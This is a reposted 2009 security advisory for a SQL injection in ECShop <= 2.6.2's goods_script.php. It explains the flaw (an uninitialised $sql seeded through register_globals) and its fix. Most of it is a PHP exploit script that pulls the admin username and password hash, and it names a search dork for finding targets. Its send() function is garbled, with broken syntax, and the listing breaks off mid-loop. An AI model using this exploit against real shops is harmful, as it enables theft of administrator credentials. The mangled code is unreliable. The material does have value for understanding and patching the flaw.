By Ryat
http://bbs.wolvez.org
2009-03-24
Affected versions: ECShop 2.5.x and 2.6.x (the PoC below is written for <= 2.6.2). Other versions were not tested. The injection depends on the target running PHP with register_globals = On (see the note in the exploit header).
goods_script.php, around line 44 (branch bodies elided):
// Excerpt of goods_script.php (ECShop 2.5.x / 2.6.x), reconstructed from the
// garbled paste in this post; elided branch bodies are shown as "// ...".
// The pasted copy reads "= collection" here; ECShop compares with
// == 'collection', which is what is restored below.
//
// Security note: $sql is only ever appended to (.=) in this excerpt. When
// 'type' is neither empty nor 'collection', both branches are skipped and
// nothing before the .= assigns $sql. With register_globals = On, a request
// parameter named "sql" becomes the initial value of $sql, so the LIMIT suffix
// is appended to attacker-chosen SQL and the whole string goes to
// $db->query() unchanged. Fix: assign $sql = '' before the branches (and
// reject unknown 'type' values), and run with register_globals = Off.
if (empty($_GET['type']))
{
    // ...
}
elseif ($_GET['type'] == 'collection')
{
    // ...
}
// goods_num is passed through intval(), so this suffix itself is not injectable;
// the problem is the uninitialised $sql it is appended to.
$sql .= "LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);
$sql is never initialised on the path where 'type' is neither empty nor 'collection' (both branches are skipped), yet the code still does `$sql .= "LIMIT ..."` and passes the result to `$db->query()`. With register_globals = On, a request parameter named `sql` becomes the starting value of `$sql`, so an unauthenticated POST to goods_script.php with an arbitrary `type` value and an attacker-supplied `sql` field executes attacker-chosen SQL. The PoC below sends `sql=SELECT CONCAT(user_name,0x3a,password) AS goods_id FROM ecs_admin_user WHERE action_list=0x616c6c LIMIT 1 #`: the hex literal `0x616c6c` is 'all' (the super-administrator's action_list) written without quotes, the alias `goods_id` makes the result land where the page normally prints a goods id, and the trailing `#` comments out the appended LIMIT clause. Remediation: initialise `$sql = ''` before the branches, reject unknown `type` values, and disable register_globals (removed entirely in PHP 5.4).
Exploit (PoC):
#!/usr/bin/php
<?php
// ECShop <= 2.6.2 goods_script.php SQL-injection PoC (original by puret_t,
// 2009), reconstructed from the garbled paste in this post. Prerequisite:
// the target runs PHP with register_globals = On, so the POST field "sql"
// built in send() seeds the uninitialised $sql in goods_script.php.
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection/admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');

/**
 * Works with register_globals = On
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php ' . $argv[0] . ' localhost /ecshop/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);               // E_ERROR | E_WARNING | E_PARSE
ini_set('max_execution_time', 0); // no CLI time limit while waiting on the socket

$host = $argv[1];
$path = $argv[2];

// send() (defined further down) performs the raw HTTP POST and returns the
// response body; it reads $host and $path via "global".
$resp = send();

// The injected query aliases CONCAT(user_name, ':', password) as goods_id, so
// the response is expected to contain "name:<32 hex chars>" where a goods id
// would normally be printed — apparently inside an href attribute, given the
// pattern below. Anything else leaves $hash empty.
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);

if ($hash)
    exit("Expoilt Success!\nAdmin: $hash[1]\nPassword (md5): $hash[2]\n");
else
    exit("Exploit Failed!\n");
Function send ()
{
Global $ host, $ path;
$ Cmd = SQL = SELECT CONCAT (user_name, 0x3a, password) as goods_id FROM ecs_admin_user WHERE action_list = 0x. bin2hex (all). LIMIT 1 #;
$ Data = "POST". $ path. "goods_script.php? Type = ". time ()." HTTP/1.1 ";
$ Data. = "Accept :*/*";
$ Data. = "Accept-Language: zh-cn ";
$ Data. = "Content-Type: application/x-www-form-urlencoded ";
$ Data. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Data. = "Host: $ host ";
$ Data. = "Content-Length:". strlen ($ cmd )."";
$ Data. = "Connection: Close ";
$ Data. = $ cmd;
$ Fp = fsockopen ($ host, 80 );
Fputs ($ fp, $ data );
$ Resp =;
While ($ fp &&! Feof ($ fp ))